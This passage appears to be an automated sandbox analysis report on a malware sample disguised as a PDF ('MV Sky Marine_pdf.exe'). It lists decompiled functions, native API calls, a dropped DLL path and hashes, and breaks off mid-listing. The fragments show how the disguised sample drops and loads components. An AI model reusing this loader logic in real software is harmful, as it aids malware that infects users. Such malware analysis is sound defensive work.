                                                                                                  0x100016aa
                                                                                                  0x100016bf

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,751A0170,00000001,?,100011FE,0000004F,00000001), ref: 10001726
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,100011FE,0000004F,00000001), ref: 1000172D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition
                                                                                                  • String ID: VUUU
                                                                                                  • API String ID: 4283984680-2040033107
                                                                                                  • Opcode ID: a964d3017e93623f834dae234c1993fbf6a141eaae921d3b3dbfe0fce282430c
                                                                                                  • Instruction ID: 80c197dcec039ca50b61686d671a022bee678a06f5560ce8a5d051c816b5c030
                                                                                                  • Opcode Fuzzy Hash: a964d3017e93623f834dae234c1993fbf6a141eaae921d3b3dbfe0fce282430c
                                                                                                  • Instruction Fuzzy Hash: 2701F7364041149BE308CF5CCD446ECB7F9DB483E1B45421AE919972B4EBB0EA14CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a030 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405C9B(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                  0x004024f1
                                                                                                  0x004024f1
                                                                                                  0x004024f4
                                                                                                  0x0040250f
                                                                                                  0x004024f6
                                                                                                  0x004024f8
                                                                                                  0x004024fd
                                                                                                  0x00402504
                                                                                                  0x00402516
                                                                                                  0x0040268f
                                                                                                  0x0040268f
                                                                                                  0x0040251c
                                                                                                  0x0040252e
                                                                                                  0x004015a6
                                                                                                  0x004015a8
                                                                                                  0x00000000
                                                                                                  0x004015ae
                                                                                                  0x004015a8
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll, xrefs: 004024FD, 00402522
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileWritelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll
                                                                                                  • API String ID: 427699356-2148799638
                                                                                                  • Opcode ID: 06c53b8ef1b7de2ca7bfd2e1cdeba514b9d01c2d5126b15a1f40b5802bcec65d
                                                                                                  • Instruction ID: e5b3206c06febe055580dfe5a6a88489a342fcfa0738d480186024668fc2dcdb
                                                                                                  • Opcode Fuzzy Hash: 06c53b8ef1b7de2ca7bfd2e1cdeba514b9d01c2d5126b15a1f40b5802bcec65d
                                                                                                  • Instruction Fuzzy Hash: 4BF0E272A15244BFDB10EFA49E49AEF3668DB40348F20043BB141B51C2D6FC4940876E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405584, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405584(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a0da8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x7a0da8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                  0x0040558d
                                                                                                  0x004055a9
                                                                                                  0x004055b1
                                                                                                  0x004055b6
                                                                                                  0x00000000
                                                                                                  0x004055bc
                                                                                                  0x004055c0

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Error launching installer, xrefs: 00405597
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                  • String ID: Error launching installer
                                                                                                  • API String ID: 3712363035-66219284
                                                                                                  • Opcode ID: 287ba7aed4c1d7fc8deb6dbb6ca57f606f8b60309fe5b4e813647c830d658d7f
                                                                                                  • Instruction ID: 1d0910285d5887e7f1af43bbbb9e1ce14b205e0bf24957ac02617a6088e78187
                                                                                                  • Opcode Fuzzy Hash: 287ba7aed4c1d7fc8deb6dbb6ca57f606f8b60309fe5b4e813647c830d658d7f
                                                                                                  • Instruction Fuzzy Hash: 8AE0ECB5A00209BFDB409FA4DD0996B7BBDEF40305B008921BD11F2250E778E9108AA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004036E2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004036E2() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79dd5c;
				_t3 = E004036C7(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79dd5c =  *0x79dd5c & 0x00000000;
				return _t3;
			}







                                                                                                  0x004036e3
                                                                                                  0x004036eb
                                                                                                  0x004036f2
                                                                                                  0x004036f5
                                                                                                  0x004036f5
                                                                                                  0x004036f7
                                                                                                  0x004036fc
                                                                                                  0x00403703
                                                                                                  0x00403709
                                                                                                  0x0040370d
                                                                                                  0x0040370e
                                                                                                  0x00403716

                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7519F560,004036B9,?,004034AB,00000020), ref: 004036FC
                                                                                                  • GlobalFree.KERNEL32 ref: 00403703
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004036F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 1100898210-823278215
                                                                                                  • Opcode ID: c68695f27b54780de7632c9380ae7eb76e32f0608264f660e5d8af2826bde110
                                                                                                  • Instruction ID: 1039b9d4bfae997efe3864f43f16b70b74eeb1193bc847168fd24653c8968501
                                                                                                  • Opcode Fuzzy Hash: c68695f27b54780de7632c9380ae7eb76e32f0608264f660e5d8af2826bde110
                                                                                                  • Instruction Fuzzy Hash: 59E08C32910020ABC6311F49A90475A7B7C6B44B22F018427E900772A087786C428BC8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040585E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040585E(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                  0x0040585f
                                                                                                  0x00405869
                                                                                                  0x0040586b
                                                                                                  0x00405872
                                                                                                  0x0040587a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040587a
                                                                                                  0x0040587c
                                                                                                  0x00405881

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D11,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 00405864
                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D11,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 00405872
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrlen
                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                  • API String ID: 2709904686-1246513382
                                                                                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                  • Instruction ID: db814575930c951769e22c80c061cd1c2617a14d9c8a92b1c82cb0a4a3e1c245
                                                                                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                  • Instruction Fuzzy Hash: 7ED0C763509D705EE30372259C04B9F7A48DF16705F098866F580F6191C27C5C514FAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10001280, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 58%
                                                                                                  			E10001280() {
				signed int _t4;

				system("cls");
				E10001330(_t4);
				__imp___getch();
				return 0;
			}




                                                                                                  0x10001285
                                                                                                  0x1000128e
                                                                                                  0x10001293
                                                                                                  0x1000129b

                                                                                                  APIs
                                                                                                  • system.MSVCRT ref: 10001285
                                                                                                    • Part of subcall function 10001330: system.MSVCRT ref: 10001339
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 10001344
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 1000134E
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 10001358
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 10001362
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 1000136C
                                                                                                  • _getch.MSVCRT ref: 10001293
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _printf$system$_getch
                                                                                                  • String ID: cls
                                                                                                  • API String ID: 668655315-3046418502
                                                                                                  • Opcode ID: a4bfbed6a10874f666494872391924de3c32b4d11413416a0fdb8fecb89270a2
                                                                                                  • Instruction ID: 12fc2e0169d9cef55c7a7abd20c98f658375cc717d68ceb285f7eb1d9efaba96
                                                                                                  • Opcode Fuzzy Hash: a4bfbed6a10874f666494872391924de3c32b4d11413416a0fdb8fecb89270a2
                                                                                                  • Instruction Fuzzy Hash: 8BB01270811110CBF605A7B04C4D04F3690DF082C27004021F102C001FDF10D228D637
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405970, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405970(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                  0x0040597c
                                                                                                  0x0040597e
                                                                                                  0x004059a6
                                                                                                  0x0040598b
                                                                                                  0x00405990
                                                                                                  0x0040599b
                                                                                                  0x00000000
                                                                                                  0x004059b8
                                                                                                  0x004059a4
                                                                                                  0x004059a4
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405977
                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405990
                                                                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040599E
                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059A7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 190613189-0
                                                                                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                  • Instruction ID: f10c3429608c76b922a9aabfe128638ad90a9d7869a90c391399b90e50ce6b80
                                                                                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                  • Instruction Fuzzy Hash: 18F02776209D51EED3025B248C04E2B6B94EF92364F18043AF480F2180C33998129BBB
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Analysis Process: MV Sky Marine_pdf.exe PID: 5476 Parent PID: 5580 MV Sky Marine_pdf.exeCOMMON

                                                                                                  Executed Functions

                                                                                                  Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 37%
                                                                                                  			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                  0x00418263
                                                                                                  0x0041826f
                                                                                                  0x00418277
                                                                                                  0x00418282
                                                                                                  0x0041829d
                                                                                                  0x004182a5
                                                                                                  0x004182a9

                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: B=A$B=A
                                                                                                  • API String ID: 2738559852-2767357659
                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                  • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                  • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                  0x00409b2c
                                                                                                  0x00409b2f
                                                                                                  0x00409b34
                                                                                                  0x00409b39
                                                                                                  0x00409b43
                                                                                                  0x00409b48
                                                                                                  0x00409b4b
                                                                                                  0x00409b4d
                                                                                                  0x00409b55
                                                                                                  0x00409b5a
                                                                                                  0x00409b5a
                                                                                                  0x00409b61
                                                                                                  0x00409b69
                                                                                                  0x00409b6c
                                                                                                  0x00409b6e
                                                                                                  0x00409b82
                                                                                                  0x00000000
                                                                                                  0x00409b84
                                                                                                  0x00409b8a
                                                                                                  0x00409b3e
                                                                                                  0x00409b3e
                                                                                                  0x00409b3e

                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                  0x004181bf
                                                                                                  0x004181c7
                                                                                                  0x004181fd
                                                                                                  0x00418201

                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                  • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                  • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041838D, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0041838D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DB0(0x8b559b69, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                                  0x00418393
                                                                                                  0x0041839f
                                                                                                  0x004183a7
                                                                                                  0x004183c9
                                                                                                  0x004183cd

                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: dc7c72dba20dd52ffa0ba4e1a960f4ea472dab85c90565b053b3ec8599c89bed
                                                                                                  • Instruction ID: a8d7b7a700ba5d25d00f605317719c845479ebe15d8640263165d81c601a2403
                                                                                                  • Opcode Fuzzy Hash: dc7c72dba20dd52ffa0ba4e1a960f4ea472dab85c90565b053b3ec8599c89bed
                                                                                                  • Instruction Fuzzy Hash: 50F01CB6204108AFDB14DF89DC80EE777ADAF88354F158149BA4897241C634E811CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                  0x0041839f
                                                                                                  0x004183a7
                                                                                                  0x004183c9
                                                                                                  0x004183cd

